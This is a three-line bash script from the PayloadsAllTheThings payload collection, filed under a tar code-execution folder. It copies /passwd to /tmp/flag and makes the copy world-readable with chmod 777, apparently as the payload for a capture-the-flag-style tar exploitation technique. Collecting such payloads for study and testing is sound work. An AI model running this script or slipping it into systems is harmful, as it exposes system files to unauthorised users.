PayloadsAllTheThings/TAR_Code_Exec/shell.sh
2016-10-18 18:36:18 +07:00

3 lines
57 B
Bash
Executable File

#!/bin/bash
cat /passwd > /tmp/flag
chmod 777 /tmp/flag